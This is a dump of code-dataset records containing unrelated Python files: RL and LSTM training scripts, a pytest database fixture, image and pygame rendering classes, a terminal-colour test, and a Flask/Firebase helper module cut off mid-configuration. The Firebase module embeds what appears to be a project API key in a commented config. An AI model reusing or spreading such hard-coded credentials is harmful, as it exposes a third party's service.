average_goal = ep_goal[0]\n else:\n average_goal = sum(ep_goal[-STATS_EVERY:]) / STATS_EVERY\n if episode == 0:\n average_length = ep_lengths[0]\n else:\n average_length = sum(ep_lengths[-STATS_EVERY:]) / STATS_EVERY\n aggr_ep_goal['ep'].append(episode)\n aggr_ep_goal['goal'].append(average_goal)\n aggr_ep_goal['length'].append(average_length)\n print(f'Episode: {episode:>5d}, average reward: {average_reward:>4.1f}, learning_rate: {learning_rate:>0.2f}')\n\n env.close()\n\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['avg'],\n label=\"aggregated average rewards of \" + str(STATS_EVERY) + \" episodes\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['max'],\n label=\"aggregated max rewards of \" + str(STATS_EVERY) + \" episodes\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['min'],\n label=\"aggregated min rewards of \" + str(STATS_EVERY) + \" episodes\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig('reward.png')\n # plt.show()\n plt.clf()\n\n return ep_goal, ep_lengths\n\n\ndef main():\n reached_goals = []\n episode_lengths = []\n for i in range(10):\n q_table = np.random.uniform(low=-2, high=0, size=(BUCKET_AMOUNT + [env.action_space.n]))\n reached_goal, episode_length = qlearning(env, q_table)\n reached_goals.append(reached_goal)\n episode_lengths.append(episode_length)\n env.close()\n\n episodes = [i for i in range(np.mean(reached_goals, axis=0).shape[0])]\n\n plt.plot(episodes, np.mean(reached_goals, axis=0), label=\"reaching goal\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig('goal.png')\n # plt.show()\n\n plt.clf()\n plt.plot(episodes, np.mean(episode_lengths, axis=0), label=\"episode length\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig('length.png')\n # plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ex07-fa/ex07-fa.py","file_name":"ex07-fa.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29795340","text":"# Most code inspired from\n# https://github.com/aymericdamien/TensorFlow-Examples/blob/master/examples/3_NeuralNetworks/recurrent_network.py\nimport tensorflow as tf\nimport os\n#from tensorflow.python.ops import rnn, rnn_cell, rnn_cell_impl\nfrom tensorflow.contrib import rnn # copied from Damien Aymeric\nimport numpy as np\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nresult_dir='results/LSTM/RNN/2/'\n# call mnist function\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\nlearningRate = 1e-4\ntrainingIters = 50000\nbatchSize = 100\ndisplayStep = 20\n\nnInput = 28 # we want the input to take the 28 pixels\nnSteps = 28 # every 28\nnHidden = 128 # number of neurons for the RNN\nnClasses = 10 # this is MNIST so you know\n\nx = tf.placeholder('float', [None, nSteps, nInput])\ny = tf.placeholder('float', [None, nClasses])\n\nweights = {\n 'out': tf.Variable(tf.random_normal([nHidden, nClasses]))\n}\n\nbiases = {\n 'out': tf.Variable(tf.random_normal([nClasses]))\n}\n\n\ndef RNN(x, weights, biases):\n # current code from Damien Aymeric\n x = tf.unstack(x, nSteps, 1)\n\n # Define a lstm cell with tensorflow\n lstm_cell = rnn.BasicLSTMCell(nHidden, forget_bias=1.0)\n\n # Get lstm cell output\n outputs, states = rnn.static_rnn(lstm_cell, x, dtype=tf.float32)\n\n # Linear activation, using rnn inner loop last output\n return tf.matmul(outputs[-1], weights['out']) + biases['out']\n\npred = RNN(x, weights, biases)\n\n# optimization\n# create the cost, optimization, evaluation, and accuracy\n# for the cost softmax_cross_entropy_with_logits seems really good\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=pred))\noptimizer = tf.train.AdamOptimizer(learning_rate=learningRate).minimize(cost)\n\ncorrectPred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correctPred, tf.float32))\n\n# Add a scalar summary for the snapshot loss.\ntf.summary.scalar(cost.op.name, cost)\ntf.summary.scalar('accuracy', accuracy) # to plot train accuracy\n\n# Build the summary operation based on the TF collection of Summaries.\nsummary_op = tf.summary.merge_all()\n\n# Add the variable initializer Op.\ninit = tf.global_variables_initializer() # sess.run()?\n\n# Create a saver for writing training checkpoints.\nsaver = tf.train.Saver()\n\n\n\n\nwith tf.Session() as sess:\n sess.run(init)\n # Instantiate a SummaryWriter to output summaries and the Graph.\n summary_writer = tf.summary.FileWriter(result_dir, sess.graph)\n step = 1\n\n while (step * batchSize) < trainingIters:\n # print('hi, this is iteration ', step, 'of the while loop')\n batchX, batchY = mnist.train.next_batch(batchSize) # mnist has a way to get the next batch\n batchX = batchX.reshape((batchSize, nSteps, nInput))\n\n sess.run(optimizer, feed_dict={x: batchX, y: batchY})\n\n if step % displayStep == 0:\n acc = sess.run(accuracy, feed_dict={x: batchX, y: batchY})\n loss = sess.run(cost, feed_dict={x: batchX, y: batchY})\n print(\"Iter \" + str(step * batchSize) +\n \", Minibatch Loss= \" +\n \"{:.6f}\".format(loss) + \", Training Accuracy= \" +\n \"{:.5f}\".format(acc))\n # Update the events file which is used to monitor the training (in this case,\n # only the training loss is monitored)\n summary_str = sess.run(summary_op, feed_dict={x: batchX, y: batchY})\n summary_writer.add_summary(summary_str, step*batchSize)\n summary_writer.flush()\n checkpoint_file = os.path.join(result_dir, 'checkpoint')\n saver.save(sess, checkpoint_file, global_step=step*batchSize)\n step += 1\n print('Optimization finished')\n\n testData = mnist.test.images.reshape((-1, nSteps, nInput))\n testLabel = mnist.test.labels\n print(\"Testing Accuracy:\",\n sess.run(accuracy, feed_dict={x: testData, y: testLabel}))","sub_path":"assignment2/lstmMNIST_BasicLSTMCell.py","file_name":"lstmMNIST_BasicLSTMCell.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330205340","text":"import pytest\nimport pandas as pd\n\nimport calkx.data\n\n\n@pytest.fixture\ndef postgresdb(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"INSERT INTO skyscraper_spiders\n (name, project_id, code, recurrency_minutes)\n VALUES (\n 'samplespider',\n (SELECT project_id FROM projects WHERE name = 'test-project'),\n '',\n 60\n )\"\"\")\n c.execute(\n \"\"\"INSERT INTO skyscraper_spiders_results\n (item_id, spider_id, payload, crawl_date)\n VALUES (\n '6acc3df8-1879-42e6-ac1a-06c55321722d',\n (SELECT spider_id FROM skyscraper_spiders WHERE name = 'samplespider'),\n '{\"data\": {\"my-field\": \"my-data\"}, \"url\": \"http://example.com\", \"spider\": \"samplespider\", \"crawl_time\": \"2018-03-06T18:06:25Z\"}',\n NOW())\"\"\")\n conn.commit()\n\n yield conn\n\n\ndef test_can_read_data_for_spider(postgresdb):\n data = calkx.data.read_spiders_results(\n 'test-project', ['samplespider'], postgresdb)\n\n assert isinstance(data, pd.DataFrame)\n assert len(data) == 1\n assert data['url'][0] == 'http://example.com'\n assert data['spider'][0] == 'samplespider'\n assert data['crawl_time'][0] == '2018-03-06T18:06:25Z'\n assert data['my-field'][0] == 'my-data'\n","sub_path":"tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"493537851","text":"\"\"\"\r\n=======================================================\r\nCourse: CS4243.\r\nCourse Title: Computer Vision & Pattern Recognition.\r\nProject: CS4243 Project on 3D Walk-through of 2D Image.\r\nGroup Members: Dave Tan Woo Hong (A0106505R)\r\n Desmond Lim Hock Yeam (A0106477B)\r\n Toh Zijing (A0123506R)\r\n Darren Boo Kuok Liang (A0087547N)\r\n=======================================================\r\n======= ========== =========== ============================================\r\nVersion Date Modified By Details\r\n======= ========== =========== ============================================\r\n1.0.0 26/10/2014 Dave Tan Initial Version of Image Class\r\n incorporating the Methods: __init__,\r\n persproj, plotproj.\r\n\"\"\"\r\nimport platform\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nclass Image:\r\n \"\"\"\r\n ************\r\n Class Image.\r\n ************\r\n =========\r\n Sypnosis.\r\n =========\r\n This is a Class representing the Image Object.\r\n\r\n ========\r\n Methods.\r\n ========\r\n __init__: This is the Constructor Method for Class Image.\r\n \r\n persproj: This Method performs the Perspective Projection and returns the 2D\r\n Array containing the Projected Points.\r\n\r\n plotproj: This Method names the Plot of the 2 x 2 SubPlots according to the\r\n Title provided. This Function is used to plot the Perspective Projection of\r\n 4 Frames.\r\n \"\"\"\r\n\r\n #======================\r\n #Properties/Attributes.\r\n #======================\r\n intAttribute = None\r\n\r\n #========\r\n #Methods.\r\n #========\r\n def __init__(self, project_window, image_path):\r\n #===================\r\n #Constructor Method.\r\n #===================\r\n if platform.system() == \"Darwin\":\r\n self._image = cv2.imread(image_path, cv2.CV_LOAD_IMAGE_COLOR)[::-1,::-1]\r\n else:\r\n self._image = cv2.imread(image_path, cv2.CV_LOAD_IMAGE_COLOR)\r\n self._view = self._image[:]\r\n self._view_scale = 0.65\r\n\r\n # stores x,y,z world coords for each point\r\n self._image_points = self._image.astype(np.int)\r\n self._image_points *= 0\r\n\r\n self.intAttribute = 1\r\n\r\n def getView(self):\r\n \"\"\"\r\n Returns a copy of current view\r\n \"\"\"\r\n return cv2.resize(self._view, (0,0),\r\n fx=self._view_scale,\r\n fy=self._view_scale)\r\n\r\n def getWidth(self):\r\n return self._image.shape[1]\r\n\r\n def getHeight(self):\r\n return self._image.shape[0]\r\n\r\n def getViewScale(self):\r\n return self._view_scale\r\n\r\n def getCoordsFor(self, x, y):\r\n return self._image_points[y][x]\r\n\r\n def setZFor(self, zValue, x, y ):\r\n self._image_points[y][x][-1] = zValue\r\n\r\n def convertToImageSpace(self, x, y):\r\n x *= 1.0/self._view_scale\r\n y *= 1.0/self._view_scale\r\n return (int(x), int(y))\r\n\r\n def convertToViewSpace(self, x, y):\r\n x *= self._view_scale\r\n y *= self._view_scale\r\n return (int(x), int(y))\r\n\r\n def persproj(self, array3DScPts, arrayCamTrans, matCamOrient, int_f = 1,\r\n int_u0 = 0, int_bu = 1, int_ku = 1, int_v0 = 0, int_bv = 1,\r\n int_kv = 1):\r\n #===============\r\n #Initialisation.\r\n #===============\r\n import numpy as np\r\n i_f = np.transpose(matCamOrient[0, :])\r\n j_f = np.transpose(matCamOrient[1, :])\r\n k_f = np.transpose(matCamOrient[2, :])\r\n ufp = []\r\n vfp = []\r\n intRows = array3DScPts.shape[0]\r\n matProjPts = np.zeros([1, 2])\r\n\r\n for intRowIndex in range(0, intRows, 1):\r\n #===============================\r\n #Extract Current 3D Coordinates.\r\n #===============================\r\n listCurrent3DPt = array3DScPts[intRowIndex, :]\r\n sp_minus_tf = listCurrent3DPt - arrayCamTrans\r\n\r\n #====\r\n #ufp.\r\n #====\r\n fltNumerator = int_f * np.dot(np.transpose(sp_minus_tf), i_f)\r\n fltDenominator = np.dot(np.transpose(sp_minus_tf), k_f)\r\n ufp = (fltNumerator / fltDenominator) * int_bu + int_u0\r\n \r\n #====\r\n #vfp.\r\n #==== \r\n fltNumerator = int_f * np.dot(np.transpose(sp_minus_tf), j_f)\r\n fltDenominator = np.dot(np.transpose(sp_minus_tf), k_f)\r\n vfp = (fltNumerator / fltDenominator) * int_bv + int_v0\r\n\r\n #=============================\r\n #Store the Projected 2D Point.\r\n #=============================\r\n if(intRowIndex == 0):\r\n #=========================\r\n #First Projected 2D Point.\r\n #=========================\r\n matProjPts = [ufp, vfp]\r\n else:\r\n #=========================\r\n #Subsequent Rotated Point.\r\n #=========================\r\n matProjPts = np.append(matProjPts, [ufp, vfp])\r\n\r\n #==========================\r\n #Return the 2D Coordinates.\r\n #==========================\r\n matProjPts = np.matrix(matProjPts)\r\n intRows = matProjPts.shape[0]\r\n intColumns = matProjPts.shape[1]\r\n intElements = intRows * intColumns\r\n intNewRows = int(intElements / 2)\r\n matProjPts = np.reshape(matProjPts, (intNewRows, 2))\r\n return(matProjPts)\r\n\r\n def plotproj(self, strPlotTitle, arrayFr1PersProj, arrayFr2PersProj,\r\n arrayFr3PersProj, arrayFr4PersProj):\r\n #===============\r\n #Initialisation.\r\n #===============\r\n import matplotlib\r\n import matplotlib.pyplot as plt\r\n plt.suptitle(strPlotTitle)\r\n\r\n #=======================================================\r\n #Build the Subplots comprising the 3D-to-2D Projections.\r\n #=======================================================\r\n for i in range(1, 5):\r\n #======================\r\n #Configure the Subplot.\r\n #======================\r\n plt.subplot(2, 2, i)\r\n plt.title(\"Frame \" + str(i))\r\n plt.xlabel(\"X\")\r\n plt.ylabel(\"Y\")\r\n x = eval(\"arrayFr\" + str(i) + \"PersProj[:, 0]\")\r\n y = eval(\"arrayFr\" + str(i) + \"PersProj[:, 1]\")\r\n \r\n #=================\r\n #Draw the Subplot.\r\n #=================\r\n plt.plot(x, y, 'r.')\r\n\r\n #======================================================\r\n #Display the 3D-to-2D Projection Plot for the 4 Frames.\r\n #======================================================\r\n plt.show()\r\n\r\n \r\n\r\n \r\n","sub_path":"cs4243/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"518861870","text":"from unittest.mock import (\n NonCallableMock,\n patch,\n)\n\nimport pytest\n\nfrom syrupy.constants import DISABLE_COLOR_ENV_VAR\nfrom syrupy.terminal import (\n bold,\n context_style,\n error_style,\n green,\n received_diff_style,\n received_style,\n red,\n reset,\n snapshot_diff_style,\n snapshot_style,\n success_style,\n warning_style,\n yellow,\n)\n\n\ndef test_colors_off_does_not_call_colored():\n \"\"\"\n Test that disabling colors prevents instantiating colored object.\n Enables workarounds for when instantiating the colored object causes crashes,\n see issue #633\n \"\"\"\n\n with patch(\n \"syrupy.terminal.colored.colored.__init__\", new_callable=NonCallableMock\n ):\n with patch.dict(\"os.environ\", {DISABLE_COLOR_ENV_VAR: \"true\"}):\n for method in (\n reset,\n red,\n yellow,\n green,\n bold,\n error_style,\n warning_style,\n success_style,\n snapshot_style,\n snapshot_diff_style,\n received_style,\n received_diff_style,\n context_style,\n ):\n _ = method(\"foo\")\n\n # Prevent test from accidentally passing by patching wrong object\n with pytest.raises(TypeError) as excinfo:\n _ = red(\"foo\")\n\n assert \"NonCallableMock\" in str(excinfo.value)\n","sub_path":"tests/syrupy/test_terminal.py","file_name":"test_terminal.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40166745","text":"# MODULES\nimport pygame, sys\nimport numpy as np\nimport random\nimport time\nfrom copy import deepcopy as dcopy\n\n# initializes pygame\n\n# ---------\n# CONSTANTS\n# ---------\n\n# rgb: red green blue\nRED = (255, 0, 0)\nBG_COLOR = (231, 225, 232)\nLINE_COLOR = (0, 0, 0)\nCIRCLE_COLOR = (239, 231, 200)\nCROSS_COLOR = (66, 66, 66)\n \nclass Screen():\n def __init__(self, env):\n if env.show_screen:\n pygame.init()\n self.env = env\n self.WIDTH = 800\n self.HEIGHT = 800\n self.LINE_WIDTH = 1\n self.SQUARE_SIZE = int(self.HEIGHT / 20)\n self.color_A = (255, 172, 88)\n self.color_B = (129, 188, 255)\n if env.show_screen:\n self.load_image()\n pygame.display.set_caption( 'ProCon-2020' ) \n\n def render(self):\n pygame.display.update()\n\n def load_image(self):\n self.agent_A_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/agent1.png'), (self.SQUARE_SIZE, self.SQUARE_SIZE))\n self.agent_B_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/agent2.png'), (self.SQUARE_SIZE, self.SQUARE_SIZE))\n self.wall_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/wall.jpg'), (self.SQUARE_SIZE, self.SQUARE_SIZE))\n self.background_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/background.jpg'), (626, 966))\n self.table_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/board.png'), (400, 350))\n self.treasure_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/treasure.jpg'),\n (int(self.SQUARE_SIZE / 2), int(self.SQUARE_SIZE / 2))) \n \n def coord(self, x, y):\n return x * self.SQUARE_SIZE, y * self.SQUARE_SIZE\n \n def setup(self, env): \n self.h = env.height\n self.w = env.width\n self.screen = pygame.display.set_mode(self.coord(self.h + 8, self.w)) \n self.screen.fill( BG_COLOR )\n self.draw_lines()\n self.screen.blit(self.background_img, self.coord(self.h, 0))\n for i in range(self.h):\n for j in range(self.w):\n # draw wall\n if self.env.wall_board[i][j] == 1:\n self.draw_wall(i, j)\n else:\n self.reset_square([i, j], -1)\n \n # draw treasure\n if self.env.treasure_board[i][j] > 0:\n self.show_treasure_value(self.env.norm_treasure_board[i][j], i, j)\n \n # draw agent\n for player_id in range(self.env.num_players):\n for agent_ID in range(self.env.n_agents):\n self.draw_squares(self.env.agent_pos[player_id][agent_ID], player_id)\n self.reset_square(self.env.agent_pos[player_id][agent_ID], player_id, agent_ID)\n \n self.show_score()\n pygame.display.update()\n\n def start(self):\n game_over = False\n # -------\n \n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n \n if event.type == pygame.MOUSEBUTTONDOWN and not game_over:\n sys.exit()\n # mouseX = event.pos[0] # x\n # mouseY = event.pos[1] # y\n \n # clicked_row = int(mouseY // self.SQUARE_SIZE)\n # clicked_col = int(mouseX // self.SQUARE_SIZE)\n \n \n pygame.display.update()\n \n def show_score(self):\n self.screen.blit(self.table_img, self.coord(self.h - 1, -2))\n \n myFont = pygame.font.SysFont(\"Times New Roman\", 30)\n \n color = (255, 178, 21)\n \n SA = myFont.render(\" : \" + str(round(self.env.players[0].total_score)), 0, color)\n SB = myFont.render(\" : \" + str(round(self.env.players[1].total_score)), 0, color)\n STurns = myFont.render(\"Turns: \" + str(self.env.remaining_turns), 0, color)\n \n \n self.screen.blit(SA, self.coord(self.h + 1, 1))\n self.screen.blit(SB, self.coord(self.h + 1, 2))\n self.screen.blit(STurns, self.coord(self.h + 1, 3))\n self.screen.blit(self.agent_A_img, (self.h * self.SQUARE_SIZE + 30, -5 + 1 * self.SQUARE_SIZE))\n self.screen.blit(self.agent_B_img, (self.h * self.SQUARE_SIZE+ 30, -5 + 2 * self.SQUARE_SIZE))\n \n def show_value(self, value, x, y):\n myFont = pygame.font.SysFont(\"Times New Roman\", 20)\n value = round(value)\n pos = 5\n if value >= 0 and value < 10:\n pos = 15\n elif value > 10 or value > -10:\n pos = 10\n value = myFont.render(str(value), 1, (0, 0, 0))\n self.screen.blit(value, (x * self.SQUARE_SIZE + pos, y * self.SQUARE_SIZE + 8))\n \n def show_index_agent(self, x, y, agent_ID):\n myFont = pygame.font.SysFont(\"Times New Roman\", 13)\n agent_ID = myFont.render(str(abs(agent_ID)), 1, (0, 111, 220))\n \n self.screen.blit(agent_ID, (x * self.SQUARE_SIZE + 17, y * self.SQUARE_SIZE + 20))\n \n \n def show_treasure_value(self, value, x, y):\n self.draw_treasure(x, y)\n value = round(value)\n myFont = pygame.font.SysFont(\"Times New Roman\", 13)\n value = myFont.render(str(value), 1, (255, 0, 0))\n self.screen.blit(value, (x * self.SQUARE_SIZE + 2, y * self.SQUARE_SIZE + int(self.SQUARE_SIZE * 5 / 7)))\n \n def draw_wall(self, x, y):\n self.screen.blit(self.wall_img, self.coord(x, y))\n \n def draw_treasure(self, x, y):\n self.screen.blit(self.treasure_img, self.coord(x, y))\n \n def draw_agent(self, x, y, player_ID, agent_ID):\n player_img = self.agent_A_img if player_ID == 0 else self.agent_B_img\n self.screen.blit(player_img, self.coord(x, y))\n self.show_index_agent(x, y, agent_ID + 1)\n \n \n def draw_lines(self):\n for i in range(self.w):\n pygame.draw.line(self.screen, LINE_COLOR, (0, i * self.SQUARE_SIZE), \n (self.h * self.SQUARE_SIZE, i * self.SQUARE_SIZE), self.LINE_WIDTH )\n for i in range(self.h):\n pygame.draw.line(self.screen, LINE_COLOR, (i * self.SQUARE_SIZE, 0),\n (i * self.SQUARE_SIZE, self.w * self.SQUARE_SIZE), self.LINE_WIDTH )\n \n def _draw_squares(self, x1, y1, x2, y2, player_ID):\n color = self.color_A if player_ID == 0 else self.color_B\n pygame.draw.rect(self.screen, color, (x1, y1, x2, y2))\n \n \n def draw_squares(self, coord, player_ID):\n x, y = coord\n self._draw_squares(2 + x * self.SQUARE_SIZE, 2 + y * self.SQUARE_SIZE,\n (self.SQUARE_SIZE - 3), (self.SQUARE_SIZE - 3), player_ID)\n \n def _redraw_squares(self, x1, y1, x2, y2, player_ID):\n color = self.color_A if player_ID == 0 else self.color_B\n pygame.draw.rect(self.screen, color, (x1, y1, x2, y2))\n \n \n def redraw_squares(self, x, y, player_ID):\n self._redraw_squares(2 + x * self.SQUARE_SIZE, 2 + y * self.SQUARE_SIZE,\n (self.SQUARE_SIZE - 3), (self.SQUARE_SIZE - 3), player_ID)\n self.show_value(self.env.norm_score_board[x][y], x, y)\n \n def _reset_squares(self, x1, y1, x2, y2, player_ID):\n color = self.color_A if player_ID == 0 else self.color_B\n if player_ID < 0:\n color = BG_COLOR\n pygame.draw.rect(self.screen, color, (x1, y1, x2, y2))\n \n def reset_square(self, coord, player_ID, agent_ID = 0):\n x, y = coord\n self._reset_squares(2 + x * self.SQUARE_SIZE, 2 + y * self.SQUARE_SIZE,\n (self.SQUARE_SIZE - 3), (self.SQUARE_SIZE - 3), player_ID)\n if player_ID >= 0:\n self.draw_agent(x, y, player_ID, agent_ID)\n else:\n self.show_value(self.env.norm_score_board[x][y], x, y)\n \n def reset(self):\n self.screen.fill( BG_COLOR )\n # self.draw_lines()\n self.screen.blit(self.background_img, self.coord(self.h, 0))\n # self.screen.blit(self.background_img, self.coord(20, 0))\n self.draw_lines()\n for i in range(self.h):\n for j in range(self.w):\n # draw wall\n if self.env.wall_board[i][j] == 1:\n self.draw_wall(i, j)\n else:\n self.reset_square([i, j], -1, 0)\n \n # draw treasure\n if self.env.treasure_board[i][j] > 0:\n self.show_treasure_value(self.env.norm_treasure_board[i][j], i, j)\n \n # draw agent\n for player_id in range(self.env.num_players):\n for agent_ID in range(self.env.n_agents):\n self.draw_squares(self.env.agent_pos[player_id][agent_ID], player_id)\n self.reset_square(self.env.agent_pos[player_id][agent_ID], player_id, agent_ID)\n \n self.show_score()","sub_path":"GameBoard/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422397488","text":"#!/usr/bin/python\n\"\"\"\nCommon python functions for YON\n\"\"\"\nimport threading\n#from cgi import parse_qs\nfrom flask import session, current_app\nfrom functools import wraps\nimport json\nimport base64\nimport tempfile\nimport pyrebase\nfrom ConfigParser import ConfigParser\n\nclass ReturnValue:\n def __init__(self, status, data):\n self.status = status\n self.data = data\n\ndef be_get_jsonUser_data(user_id):\n \"\"\" return the current user object \"\"\"\n db_con = Common().firebase.database()\n user_json = None\n try:\n user_json = db_con.child('users', 'active', user_id).get().val()\n #current_app.logger.debug('be_get_jsonUser_data with json data {0}'.format(user_json))\n if 'contacts' in user_json:\n user_json.pop('contacts')\n if 'groups' in user_json:\n user_json.pop('groups')\n if 'in_there_contacts' in user_json:\n user_json.pop('in_there_contacts')\n if 'pn_token' in user_json:\n user_json.pop('pn_token')\n if 'image_64' in user_json:\n user_json.pop('image_64')\n if 'image' in user_json:\n user_json.pop('image')\n # check for image\n image_path = 'images/users/{0}/image'.format(user_id)\n image_url = be_common_get_image_url(image_path)\n if image_url is not None:\n user_json['image_url'] = image_url\n except IOError:\n current_app.logger.debug('get_user_data: user not exist')\n except:\n current_app.logger.debug('get_user_data: user not exist')\n return user_json\n\n\n\nclass FuncThread(threading.Thread):\n \"\"\" init new thread - the constractor get function target and arguments\"\"\"\n def __init__(self, target, *args):\n self._target = target\n self._args = args\n threading.Thread.__init__(self)\n def run(self):\n self._target(*self._args)\n\n\ndef get_member_full_name(member_id, user_id):\n \"\"\" get the member full name based on the user contacts \"\"\"\n db_con = Common().firebase.database()\n user_data = db_con.child('users', 'active', user_id).get().val()\n #current_app.logger.debug(user_data)\n if 'contacts' in user_data:\n user_contacts = user_data['contacts']\n if member_id in user_contacts.keys():\n full_name = user_contacts[member_id]['full_name']\n else:\n full_name = \"\"\n else:\n full_name = \"\"\n return full_name\n\ndef get_user_data(user=None):\n \"\"\" return the current user object \"\"\"\n #from YON.user import get_user_image\n #user = get_user_from_session()\n db_con = Common().firebase.database()\n #storage_con = Common().firebase.storage()\n user_db = db_con.child('users', 'active', user).get().val()\n nickname = user_db['nickname']\n country_code = user_db['country_code']\n phone = user_db['phone']\n status = user_db['status']\n #buser_image = user_db['image']\n image_path = 'images/users/{0}/image'.format(user)\n image_url = be_common_get_image_url(image_path)\n current_app.logger.debug('user: {0}, image url: {1}'.format(phone, image_url))\n if image_url is not None:\n img_url = image_url\n\n # img_url = \"\"\n # if buser_image is True:\n # #image_path = 'images/users/{0}/image'.format(user)\n # img_url = '/user/image/get'#storage_con.child(image_path).get_url(None)\n #str_image64 = img_url\n #if buser_image is True:\n # str_image64 = get_user_image(user)\n #user_data = {'status':status, 'nickname':nickname, 'country_code':country_code, 'phone':phone,\\\n # 'image':str_image64}\n user_data = {'status':status, 'nickname':nickname, 'country_code':country_code, 'phone':phone,\\\n 'image_url':img_url}\n return user_data\n\ndef ret_json_err_code(code, err_desc, ui_msg):\n \"\"\" Return error status in json format\"\"\"\n return json.dumps({'status':{'code':code, 'error':err_desc, 'msg':ui_msg}, 'data':''})\n\ndef ret_json_err_code_with_data(code, err_desc, ui_msg, data):\n \"\"\" Return error status in json format\"\"\"\n return json.dumps({'status':{'code':code, 'error':err_desc, 'msg':ui_msg}, 'data':data})\n\n\ndef ret_json_with_object(obj=None):\n \"\"\" build the return for the post methud \"\"\"\n #json_str = json.dumps({'status':{'code':0, 'error':'', 'msg':''}, 'data':obj})\n #json_comp = zlib.compress(json_str)\n #return json_comp\n return json.dumps({'status':{'code':0, 'error':'', 'msg':''}, 'data':obj})\n\ndef get_user_from_session():\n \"\"\" return the user from session \"\"\"\n if 'phone' in session:\n ses = str(session['phone'])\n user = ses.replace(\" \", \"\")\n else:\n user = \"\"\n return user\n\ndef get_user_token():\n \"\"\" return the user from session \"\"\"\n if 'token' in session:\n #ses = str(session['token'])\n #token = ses.replace(\" \", \"\")\n token = session['token']\n else:\n token = None\n return token\n\ndef be_common_get_image_obj(image_path):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n image = None\n try:\n image = storage.child(image_path)\n except AttributeError as e:\n current_app.logger.debug('image path not exist, {0}'.format(e))\n #it return image object\n return image\n\ndef be_common_get_image_url(image_path):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n url = None\n try:\n url = storage.child(image_path).get_url(get_user_token())\n except AttributeError as e:\n current_app.logger.debug('image path not exist, {0}'.format(e))\n #it return image object\n return url\n \n\ndef get_image(image_path):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n image = None\n try:\n image = storage.child(image_path)\n except AttributeError as e:\n current_app.logger.debug('image path not exist: {0}'.format(e))\n #it return image object\n return image\n\n\ndef be_set_image_toStorage(image_path, image_64):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n temp_local_path = tempfile.NamedTemporaryFile()\n f_desc = open(temp_local_path.name, \"w\")\n f_desc.write(base64.decodestring(image_64))\n f_desc.close()\n #user = get_user_from_session()\n storage.child(image_path).put(temp_local_path.name, None)\n return True\n\n\n\ndef set_image(image_path, image_64):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n temp_local_path = tempfile.NamedTemporaryFile()\n f_desc = open(temp_local_path.name, \"w\")\n f_desc.write(base64.decodestring(image_64))\n f_desc.close()\n #user = get_user_from_session()\n storage.child(image_path).put(temp_local_path.name, None)\n return True\n\n\ndef login_required(func):\n \"\"\" login check decorator \"\"\"\n @wraps(func)\n def decorated_function(*args, **kwargs):\n \"\"\" Decorator for login \"\"\"\n if not session.has_key('phone'):\n current_app.logger.debug('no phone in session')\n return ret_json_err_code('99', 'not loged in', 'Please login')\n elif session['phone'] is None:\n current_app.logger.debug('phone is empty-not loged in')\n return ret_json_err_code('98', 'not loged in', 'Please login')\n elif check_user_exist(session['phone']) == False:\n return ret_json_err_code('97', 'user not exist', 'user not exist')\n return func(*args, **kwargs)\n return decorated_function\n\n\nAPP_NAME = 'YON'\n\nclass Singleton(type):\n \"\"\" Metaclass for singleton \"\"\"\n def __init__(cls, name, bases, dictionary):\n super(Singleton, cls).__init__(name, bases, dictionary)\n cls.instance = None\n\n def __call__(cls, *args, **kw):\n if cls.instance is None:\n cls.instance = super(Singleton, cls).__call__(*args, **kw)\n return cls.instance\n\n\nclass Common(object):\n \"\"\" Common class for app \"\"\"\n __metaclass__ = Singleton\n firebase = None\n dummy_var = 0\n\n def connect_to_firebase(self):\n \"\"\" Connecting and returning firebase \"\"\"\n #import pyrebase\n\t#config = ConfigParser()\n\t#config.read('/home/ubuntu/YON/secret/firebase_conf.conf')\n\t#fb_conf = dict(config.items('dev'))\n # dev_config = {\n # \"apiKey\": \"AIzaSyBoKcClZzYl1gLE4XirQaaJQCtEwxwUYcg\",\n # \"authDomain\": \"koloodev.firebaseapp.com\",\n # \"databaseURL\": 'https://koloodev.firebaseio.com/',\n # \"storageBucket\": \"koloodev.appspot.com\",\n # #\"serviceAccount\": \"/home/ubuntu/YON/secret/koloodev-firebase-adminsdk-dnjii-c54f273342.json\"\n # \"serviceAccount\": 